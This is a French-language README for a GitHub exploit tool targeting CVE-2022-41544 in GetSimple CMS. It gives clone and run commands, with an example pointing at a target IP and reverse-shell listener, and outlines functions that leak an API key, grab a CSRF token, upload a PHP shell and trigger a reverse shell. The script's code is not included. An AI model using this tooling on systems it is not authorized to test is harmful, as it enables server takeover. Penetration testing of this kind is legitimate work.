
Script d'exploit Python pour CVE-2022-41544 dans GetSimple CMS. Automatise la fuite de clé API, l'extraction de jeton CSRF, le téléchargement de shell PHP et le déclenchement de shell inverse pour les tests d'intrusion.
Ce dépôt contient un script pour exploiter la vulnérabilité CVE-2022-41544 dans GetSimple CMS. Le script effectue plusieurs étapes pour vérifier les vulnérabilités, extraire des clés API, définir des cookies, obtenir des tokens CSRF, téléverser un shell et déclencher le shell.
telnetlib obsolète car il n'était pas nécessaire au fonctionnement du script.Cloner le dépôt :
git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
cd CVE-2022-41544
Installer les dépendances :
Assurez-vous que Python 3 est installé ainsi que la bibliothèque requests.
pip3 install requests
Exécuter le script :
python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
<target> : Le domaine ou l'adresse IP cible.<path> : Le chemin d'installation de GetSimple CMS.<ip:port> : L'adresse IP et le port pour le reverse shell.<username> : Le nom d'utilisateur admin pour GetSimple CMS.Exemple :
python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin


print_the_banner() : Affiche une bannière stylisée à l'aide d'ASCII art.get_version(target, path) : Vérifie si la version cible de GetSimple CMS est vulnérable.api_leak(target, path) : Tente de récupérer une clé API à partir d'un fichier XML d'autorisation.set_cookies(username, version, apikey) : Définit les cookies requis pour les requêtes suivantes en fonction de la clé API récupérée.get_csrf_token(target, path, headers) : Extrait un token CSRF nécessaire pour téléverser un shell.upload_shell(target, path, headers, nonce, shell_content) : Téléverse un shell PHP sur le serveur cible.shell_trigger(target, path) : Déclenche le shell téléversé pour établir une connexion reverse shell.La fonction main() orchestre l'ensemble du processus en appelant les fonctions ci-dessus dans l'ordre pour exploiter la vulnérabilité CVE-2022-41544.
Ce script a été développé par h3x0v3rl0rd.
Ce script est fourni à des fins éducatives uniquement. L'accès non autorisé à des systèmes est illégal et contraire à l'éthique. Utilisez ce script de manière responsable et uniquement sur des systèmes pour lesquels vous avez l'autorisation explicite de tester.
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.